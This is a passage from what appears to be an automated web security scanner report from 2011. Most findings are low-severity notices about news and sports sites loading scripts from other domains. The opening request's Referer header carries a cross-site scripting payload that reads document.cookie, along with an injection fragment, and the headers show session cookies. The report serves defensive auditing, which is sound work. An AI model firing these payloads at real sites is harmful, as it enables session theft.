Host: photoblog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_vine/printer?call=streamSessionObjects&sectionDomain=photoblog&path=/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sunb630a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee5d9d58c461
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377588; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:56:39 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 28946

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a2e5335e5d3629f32d38728e2045d241483ba42d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3523ed6c0a92179cbcf864e66c3b25d367f590e6.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.273. http://planetary.org/blog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://planetary.org
Path:   /blog

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog HTTP/1.1
Host: planetary.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:46 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 46216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</div>-->
           <script type="text/javascript" src="http://embed.technorati.com/embed/er4sdfxfcg.js"></script>
...[SNIP]...
</table>
<script
src="http://twitterjs.googlecode.com/svn/trunk/src/twitter.min.js"
type="text/javascript">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#planetary"></script>
...[SNIP]...

23.274. http://polls.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://polls.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: polls.newsvine.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=276
Date: Sun, 30 Jan 2011 15:07:52 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 39294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.275. http://preps.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://preps.scout.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: preps.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:49 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:27:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:33 GMT
ETag: "1CBC0104B911480"
Content-Type: text/html
Content-Length: 29848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>High School Sports Front Page</title>
<meta http-equiv="Con
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.276. http://profootball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profootball.scout.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: profootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:54 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:27:54 GMT
Last-Modified: Sun, 30 Jan 2011 02:16:11 GMT
ETag: "1CBC023A97B2780"
Content-Type: text/html
Content-Length: 41358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.277. http://progolftalk.nbcsports.com/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related

Summary

Severity:   Information
Confidence:   Certain
Host:   http://progolftalk.nbcsports.com
Path:   /2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related HTTP/1.1
Host: progolftalk.nbcsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 02:17:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Sun, 30 Jan 2011 02:17:27 +0000
Cache-Control: max-age=271, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://progolftalk.nbcsports.com/xmlrpc.php
Link: <http://wp.me/p1aWkj-A3>; rel=shortlink
X-nananana: Batcache
Content-Length: 120479

<!DOCTYPE html>
<html dir="ltr" lang="en">
<!--
   generated 29 seconds ago
   generated in 0.454 seconds
   served from batcache in 0.004 seconds
   expires in 271 seconds
-->
<head>
   <meta http-equiv="conte
...[SNIP]...
<meta name="keywords" content="tiger woods, pga tour, farmers insurance open, jhonattan vegas" />


       <script src='http://wordpress.com/remote-login.php?action=js&amp;host=progolftalk.nbcsports.com&amp;id=17383827&amp;t=1296353847&amp;back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftiger-woods-shoots-74-in-farmers-third-round%2Frelated' type="text/javascript"></script>
...[SNIP]...
</style><script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&amp;ver=20101110'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&amp;ver=1.4.4'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1286321811g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1286321811g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1286321811g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1286321811g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/comment-reply.js?m=1231878779g&amp;ver=20090102'></script>
...[SNIP]...
<!-- Courtesy of Kimili Flash Embed - Version 1.4.3 -->
   <script src="http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1286321811g&amp;ver=1.3'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- More info available at http://www.omniture.com -->
   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1286579676g&amp;ver=1.3"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.20.3.
   Copyright 1997-2009 Omniture, Inc. More info available at
   http://www.omniture.com -->
   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1286579676g&amp;ver=1.3"></script>
...[SNIP]...
<!-- End SiteCatalyst code version: H.20.3. -->
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&#038;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...

23.278. http://progolftalk.nbcsports.com/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related

Summary

Severity:   Information
Confidence:   Certain
Host:   http://progolftalk.nbcsports.com
Path:   /2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related HTTP/1.1
Host: progolftalk.nbcsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 18:08:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Sun, 30 Jan 2011 18:08:03 +0000
Cache-Control: max-age=298, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://progolftalk.nbcsports.com/xmlrpc.php
Link: <http://wp.me/p1aWkj-A3>; rel=shortlink
X-nananana: Batcache
Content-Length: 119558

<!DOCTYPE html>
<html dir="ltr" lang="en">
<!--
   generated 2 seconds ago
   generated in 0.532 seconds
   served from batcache in 0.004 seconds
   expires in 298 seconds
-->
<head>
   <meta http-equiv="conten
...[SNIP]...
<meta name="keywords" content="tiger woods, pga tour, farmers insurance open, jhonattan vegas" />


       <script src='http://wordpress.com/remote-login.php?action=js&amp;host=progolftalk.nbcsports.com&amp;id=17383827&amp;t=1296410883&amp;back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftiger-woods-shoots-74-in-farmers-third-round%2Frelated' type="text/javascript"></script>
...[SNIP]...
</style><script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&amp;ver=20101110'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&amp;ver=1.4.4'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1286321811g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1286321811g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1286321811g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1286321811g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/comment-reply.js?m=1231878779g&amp;ver=20090102'></script>
...[SNIP]...
<!-- Courtesy of Kimili Flash Embed - Version 1.4.3 -->
   <script src="http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1286321811g&amp;ver=1.3'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- More info available at http://www.omniture.com -->
   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1286579676g&amp;ver=1.3"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.20.3.
   Copyright 1997-2009 Omniture, Inc. More info available at
   http://www.omniture.com -->
   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1286579676g&amp;ver=1.3"></script>
...[SNIP]...
<!-- End SiteCatalyst code version: H.20.3. -->
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&#038;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...

23.279. http://progolftalk.nbcsports.com/2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related

Summary

Severity:   Information
Confidence:   Certain
Host:   http://progolftalk.nbcsports.com
Path:   /2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related HTTP/1.1
Host: progolftalk.nbcsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 18:08:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Sun, 30 Jan 2011 18:05:01 +0000
Cache-Control: max-age=113, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://progolftalk.nbcsports.com/xmlrpc.php
Link: <http://wp.me/p1aWkj-Ab>; rel=shortlink
X-nananana: Batcache
Content-Length: 122746

<!DOCTYPE html>
<html dir="ltr" lang="en">
<!--
   generated 187 seconds ago
   generated in 0.496 seconds
   served from batcache in 0.004 seconds
   expires in 113 seconds
-->
<head>
   <meta http-equiv="cont
...[SNIP]...
<meta name="keywords" content="pga tour, farmers insurance open, torrey pines, phil mickelson, bill haas, bubba watson, hunter mahan, tiger woods, anthony kim" />


       <script src='http://wordpress.com/remote-login.php?action=js&amp;host=progolftalk.nbcsports.com&amp;id=17383827&amp;t=1296410700&amp;back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back%2Frelated' type="text/javascript"></script>
...[SNIP]...
</style><script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&amp;ver=20101110'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&amp;ver=1.4.4'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1286590400g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1286590400g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1286590400g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1286590400g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/comment-reply.js?m=1286590284g&amp;ver=20090102'></script>
...[SNIP]...
<!-- Courtesy of Kimili Flash Embed - Version 1.4.3 -->
   <script src="http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1286590400g&amp;ver=1.3'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- More info available at http://www.omniture.com -->
   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1286590400g&amp;ver=1.3"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.20.3.
   Copyright 1997-2009 Omniture, Inc. More info available at
   http://www.omniture.com -->
   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1286590400g&amp;ver=1.3"></script>
...[SNIP]...
<!-- End SiteCatalyst code version: H.20.3. -->
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&#038;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...

23.280. http://progolftalk.nbcsports.com/2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related

Summary

Severity:   Information
Confidence:   Certain
Host:   http://progolftalk.nbcsports.com
Path:   /2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/01/29/tour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back/related HTTP/1.1
Host: progolftalk.nbcsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 02:17:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Sun, 30 Jan 2011 02:13:30 +0000
Cache-Control: max-age=32, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://progolftalk.nbcsports.com/xmlrpc.php
Link: <http://wp.me/p1aWkj-Ab>; rel=shortlink
X-nananana: Batcache
Content-Length: 122690

<!DOCTYPE html>
<html dir="ltr" lang="en">
<!--
   generated 268 seconds ago
   generated in 1.333 seconds
   served from batcache in 0.004 seconds
   expires in 32 seconds
-->
<head>
   <meta http-equiv="conte
...[SNIP]...
<meta name="keywords" content="pga tour, farmers insurance open, torrey pines, phil mickelson, bill haas, bubba watson, hunter mahan, tiger woods, anthony kim" />


       <script src='http://wordpress.com/remote-login.php?action=js&amp;host=progolftalk.nbcsports.com&amp;id=17383827&amp;t=1296353609&amp;back=progolftalk.nbcsports.com%2F2011%2F01%2F29%2Ftour-stop-mickelson-haas-share-farmers-lead-with-watson-mahan-one-back%2Frelated' type="text/javascript"></script>
...[SNIP]...
</style><script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&amp;ver=20101110'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1293299738g&amp;ver=1.4.4'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-yui.js?m=1293300010g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/helvetica-neue-77-condensed.js?m=1293300010g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/cufon-config.js?m=1293300010g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/script.js?m=1294693949g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/ad.js?m=1293300010g&amp;ver=1.3'></script>
<script type='text/javascript' src='http://www.nbcudigitaladops.com/hosted/global_header.js?ver=1.3'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-includes/js/comment-reply.js?m=1293299746g&amp;ver=20090102'></script>
...[SNIP]...
<!-- Courtesy of Kimili Flash Embed - Version 1.4.3 -->
   <script src="http://nbcprogolftalk.wordpress.com/wp-content/themes/vip/plugins/kimili-flash-embed/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=1.3'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-content/themes/vip/nbcsports/js/global.js?m=1293300010g&amp;ver=1.3'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- More info available at http://www.omniture.com -->
   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode.js?m=1293300010g&amp;ver=1.3"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.20.3.
   Copyright 1997-2009 Omniture, Inc. More info available at
   http://www.omniture.com -->
   <script type="text/javascript" src="http://s1.wp.com/wp-content/themes/vip/nbcsports/js/scode-msnbc.js?m=1293300010g&amp;ver=1.3"></script>
...[SNIP]...
<!-- End SiteCatalyst code version: H.20.3. -->
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&#038;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</noscript><script src="http://s.stats.wordpress.com/w.js?19" type="text/javascript"></script>
...[SNIP]...

23.281. http://realestate.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:34 GMT
Server: Microsoft-IIS/6.0
